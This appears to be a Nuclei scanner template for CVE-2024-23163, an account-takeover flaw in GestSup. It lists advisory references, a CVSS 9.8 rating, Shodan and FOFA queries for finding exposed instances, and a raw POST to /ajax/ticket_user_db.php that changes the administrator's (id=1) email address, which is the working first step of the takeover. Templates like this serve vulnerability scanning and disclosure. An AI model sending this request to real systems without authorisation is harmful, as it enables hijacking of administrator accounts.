id: CVE-2024-23163 info: name: GestSup - Account Takeover author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741 severity: critical impact: | An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset. remediation: Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place. reference: - https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163 - https://doc.gestsup.fr/install/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-23163 cwe-id: CWE-287 metadata: verified: true max-request: 1 vendor: gestsup fofa-query: title="GestSup" shodan-query: http.favicon.hash:-283003760 tags: cve,cve2024,account-takeover,gestsup variables: email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | POST /ajax/ticket_user_db.php HTTP/1.1 Host: {{Hostname}} X-Requested-With: xmlhttprequest Content-Type: application/x-www-form-urlencoded modifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1 matchers-condition: and matchers: - type: word part: body words: - '{"status":"success' - 'firstname":"{{firstname}}","lastname":"{{lastname}}' condition: and - type: word part: header words: - 'text/html' extractors: - type: dsl dsl: - '"Firstname: "+ firstname' - '"Lastname: "+ lastname' # digest: 490a0046304402205e651225d6d683e62d175bbb93774c7608f54620faf0ea3301776bbb76b043790220374db3481988b620d8025f3cf128c9f5bceb7e3d304460bd868c53518df3f050:922c64590222798bb761d5b6d8e72950